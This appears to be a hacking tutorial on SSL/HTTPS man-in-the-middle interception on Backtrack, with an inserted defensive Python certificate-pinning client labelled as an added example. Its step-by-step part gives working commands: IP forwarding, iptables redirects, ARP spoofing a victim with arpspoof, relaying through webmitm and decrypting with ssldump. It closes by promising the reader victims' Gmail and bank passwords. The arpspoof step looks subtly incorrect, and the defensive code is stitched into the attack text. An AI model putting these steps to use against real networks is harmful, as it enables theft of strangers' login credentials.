Secure Sockets Layer (SSL) provides a secure communication channel between two peers. I am not going to discuss how SSL works here; for that, visit the link. This attack concerns HTTPS only. With HTTPS the user usually has the option of deciding whether or not to accept the certificate presented to him or her. Together with the lack of client peer authentication, this opens the possibility of a man-in-the-middle attack, which is a widely known weakness of SSL. The attacker can impersonate the server to the client and create two secure channels, one to the client and one to the server.
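The weakness described above is the client's willingness to accept a certificate that does not chain to a trusted root, or that is not the one it expected. The following is an added example (not code from the original post) of a client that removes that choice: it requires chain and hostname validation, and additionally pins the SHA-256 fingerprint of the certificate it expects, so a relay that presents its own certificate is refused before any application data is sent. The hostname, port and pin value in the usage block are assumed placeholders.

```python
"""Strict TLS client with certificate pinning (added example, not from the page)."""
import hashlib
import socket
import ssl


def make_strict_context() -> ssl.SSLContext:
    """Build a client context with no 'accept the certificate anyway' path.

    create_default_context() already sets these values; they are repeated
    explicitly so a reviewer can see that verification cannot be skipped.
    """
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
    ctx.check_hostname = True            # certificate must match the requested host
    ctx.verify_mode = ssl.CERT_REQUIRED  # and must chain to a trusted root
    return ctx


def is_strict(ctx: ssl.SSLContext) -> bool:
    """True if the context enforces both hostname matching and chain validation."""
    return ctx.check_hostname is True and ctx.verify_mode == ssl.CERT_REQUIRED


def fingerprint(der_cert: bytes) -> str:
    """Hex SHA-256 of a DER-encoded certificate, the usual pin format."""
    return hashlib.sha256(der_cert).hexdigest()


def check_pin(der_cert: bytes, pinned: set) -> bool:
    """True only if the presented certificate is one the client has pinned.

    A relay that generates its own certificate on the fly can at best make
    the user click through a warning; it cannot produce a certificate whose
    hash is in this set.
    """
    return fingerprint(der_cert) in pinned


def connect_pinned(host: str, port: int, pinned: set, timeout: float = 5.0) -> ssl.SSLSocket:
    """Open a TLS connection and tear it down if the peer certificate is not pinned.

    Chain and hostname validation happen inside wrap_socket(), which raises
    ssl.SSLCertVerificationError on failure; the pin check then runs on the
    exact DER bytes the peer presented.
    """
    ctx = make_strict_context()
    raw = socket.create_connection((host, port), timeout=timeout)
    tls = ctx.wrap_socket(raw, server_hostname=host)
    der = tls.getpeercert(binary_form=True)
    if der is None or not check_pin(der, pinned):
        tls.close()
        raise ssl.SSLError(f"peer certificate for {host} does not match a pinned fingerprint")
    return tls


if __name__ == "__main__":
    # Assumed hostname and placeholder pin; a real deployment pins the
    # fingerprint(s) obtained out of band from the site operator.
    PINNED = {"<sha256-hex-of-expected-certificate>"}
    try:
        sock = connect_pinned("example.invalid", 443, PINNED)
        sock.close()
    except (OSError, ssl.SSLError) as exc:
        print("connection refused by client policy or failed:", exc)
```

Pinning is a second line of defence on top of chain validation, not a replacement for it: the pinned set must be rotated when the legitimate certificate is renewed, which is why the usage block keeps it as an explicit, out-of-band value rather than learning it from the first connection.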
Prerequisites
Any spoofing software: In a man-in-the-middle attack the attacker has to redirect the client's communication to himself, so you need software with a spoofing feature to implement the redirection.
Webmitm: As the communication is encrypted, an active relay tool is required; simple TCP forwarding is not enough.
Ssldump: To decrypt the data packets that arrive at your computer.
Note: Use the Backtrack operating system, which has all these tools installed already. This OS is designed specifically for security and hacking purposes. The commands used in this tutorial are also based on this OS, but the same approach can be used on any OS.
Attack Preparation:
Step 1. Turn on IP forwarding so that packets are not dropped by your computer.
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2. The firewall needs to follow certain rules; if they are not present, add these entries to your firewall.
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
Step 3. Spoof the victim's computer so that its packets are routed through your computer instead of the victim's default gateway.
arpspoof -t "Victim's ip" "Your ip"
Step 4. Turn on webmitm.
webmitm -d
Step 5. Run ssldump so that it decrypts the SSL entries and writes them to a log file.
ssldump -n -d -k webmitm.crt | tee ssldump.log
Now all you have to do is wait for the victim to log into google/gmail/yahoo/msn/hotmail or any other HTTPS site, even a bank, and you will see the passwords pop up in the terminal.